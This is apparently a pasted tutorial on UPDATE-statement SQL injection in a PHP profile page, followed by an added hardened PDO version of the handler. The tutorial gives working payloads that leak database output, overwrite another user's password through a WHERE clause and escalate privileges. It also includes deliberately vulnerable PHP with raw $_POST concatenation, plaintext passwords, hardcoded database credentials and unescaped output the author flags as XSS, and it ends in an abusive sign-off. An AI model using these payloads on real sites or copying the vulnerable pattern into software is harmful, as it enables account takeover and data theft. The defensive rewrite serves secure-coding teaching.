Hey, I am going to show you a little about UPDATE SQL injections.
This occurs sometimes, for example in profile pages.
The SQL statement is not secure, because there are no filter mechanisms active and I have not used PDO or similar.
This is mostly exploited as a blind SQL injection; I will show you how to get output anyway.
And far more interesting things ;)
The interesting line from the source code is the following:

if($_POST["submit"]) {
    mysql_query("UPDATE users SET user_name='".$_POST['user_name']."', user_password='".$_POST['user_password']."', user_realname='".$_POST['user_realname']."', user_website='".$_POST['user_website']."' where id=".$id) or die(mysql_error());
    echo "<b> Your Profile was successfully updated!</b><br>\n";
}
The code tells the query to put the input directly into the database, which is very dangerous behaviour.
I have 2 prepared users:
id 1 jon doe
id 2 maria doe
______________________________________________________
You can tell by simply checking the following payload:
1' OR 1='1
This is a good indicator that the form is vulnerable; let's look at the source.
The input fields have very interesting names; you could just try to overwrite a column by doing the following
(the requirement is that the column names you are trying to overwrite exist!):
', user_website=(select 123), user_realname='1
What you actually do is escape from the column set, and then set your own by using a direct MySQL subquery
(select 123)
and then use user_realname to close the query with correct syntax.
This tells the query to insert YOUR statement inside the query; you actually just use your own statement. You can now print everything you want, for example:
', user_website=(select version()), user_realname='1
You have direct output from the database, but there is more.
You can UPDATE values like passwords of other users:
', user_password='mynewchangedpassword' where id=2#
This will change the password owned by another user (id 2).
In this example, other values are overwritten too, because all data is overwritten in the example profile page update.
Let's check Maria's profile password:
As you can see, we have overwritten Maria's profile values.
You can also raise your privileges when there is, for example, an admin flag like
admin=1 or rights=1/2/3/4 .
This is a cheap tutorial. Source code will be added.
this is a presentation by frank, fuck you all !
<?php
$id = ($_GET['id'] ? $_GET['id'] : 1);
mysql_connect("localhost", "stream", "hurensohn") or die(mysql_error());
mysql_select_db("stream") or die(mysql_error());
if($_POST["submit"]) {
    mysql_query("UPDATE users SET user_name='".$_POST['user_name']."', user_password='".$_POST['user_password']."', user_realname='".$_POST['user_realname']."', user_website='".$_POST['user_website']."' where id=".$id) or die(mysql_error());
    echo "<b> Your Profile was successfully updated!</b><br>\n";
}
$query = mysql_query("SELECT * from users where id=".intval($id));
$array = mysql_fetch_array($query);
?>
<h1>Edit your profile:</h1><br>
<FORM method="POST">
<LABEL for="user">Username: </LABEL>
<INPUT autocomplete="off" type="text" name="user_name" value="<?php echo $array['user_name'] ?>"><BR>
<LABEL for="real">Real Name: </LABEL>
<INPUT autocomplete="off" type="text" name="user_realname" value="<?php echo $array['user_realname'] ?>"><BR>
<LABEL for="password">Password: </LABEL>
<INPUT autocomplete="off" type="text" name="user_password" value="<?php echo $array['user_password'] ?>"><BR>
<LABEL for="website">Website: </LABEL>
<INPUT autocomplete="off" type="text" name="user_website" value="<?php echo $array['user_website'] ?>"><BR>
<INPUT type="submit" value="Send" name="submit">
</FORM>
<?php
echo "Data:<br>\n";
echo "<label id=\"user_id\"><b>ID: ".$array['id']."</b><br></label>\n";
echo "<label id=\"user_name\"><b>Username: ".$array['user_name']."</b><br></label>\n";
echo "<label id=\"user_realname\"><b>Realname: ".$array['user_realname']."</b><br></label>\n";
echo "<label id=\"user_website\"><b>Website : ".$array['user_website']."</b><br></label>\n";
?>
// you can have your cheap xss here :>
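For comparison, here is a hardened version of the same update handler, added as an example and not part of frank's paste: every value travels as a bound parameter of a PDO prepared statement, the row id comes from the session instead of ?id=, the password is hashed, and output is escaped. The DSN, the DB_USER/DB_PASSWORD placeholders and $_SESSION['user_id'] are assumptions; the users table layout is taken from the paste.

```php
<?php
// Hardened replacement for the profile update handler (added example, not the
// original paste's code). DSN and credentials are placeholders; the "users"
// table layout is taken from the paste above.
$pdo = new PDO('mysql:host=localhost;dbname=stream;charset=utf8mb4', 'DB_USER', 'DB_PASSWORD', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
]);

// The row being edited comes from the logged-in session, not from ?id=, so the
// WHERE clause can only point at the caller's own row (login/session handling assumed).
session_start();
$id = (int) ($_SESSION['user_id'] ?? 0);

function h($s) { return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8'); }

if (isset($_POST['submit']) && $id > 0) {
    // Every user-controlled value is a bound parameter: a payload such as
    //   ', user_website=(select 123), user_realname='1
    // is stored as that literal string and can no longer alter SET or WHERE.
    $stmt = $pdo->prepare(
        'UPDATE users SET user_name = :name, user_realname = :realname, user_website = :website
          WHERE id = :id'
    );
    $stmt->execute([
        ':name'     => $_POST['user_name'] ?? '',
        ':realname' => $_POST['user_realname'] ?? '',
        ':website'  => $_POST['user_website'] ?? '',
        ':id'       => $id,
    ]);

    // Password changes are optional, handled separately, and never stored in clear text.
    if (($_POST['user_password'] ?? '') !== '') {
        $pw = $pdo->prepare('UPDATE users SET user_password = :hash WHERE id = :id');
        $pw->execute([
            ':hash' => password_hash($_POST['user_password'], PASSWORD_DEFAULT),
            ':id'   => $id,
        ]);
    }
    echo "<b>Your profile was successfully updated!</b><br>\n";
}

$sel = $pdo->prepare('SELECT id, user_name, user_realname, user_website FROM users WHERE id = :id');
$sel->execute([':id' => $id]);
$row = $sel->fetch(PDO::FETCH_ASSOC) ?: [];

// Escape on output, so a stored value is shown as text rather than rendered as HTML
// (this closes the "cheap xss" the paste notes at the end).
echo '<label id="user_name"><b>Username: ' . h($row['user_name'] ?? '') . '</b></label><br>' . "\n";
```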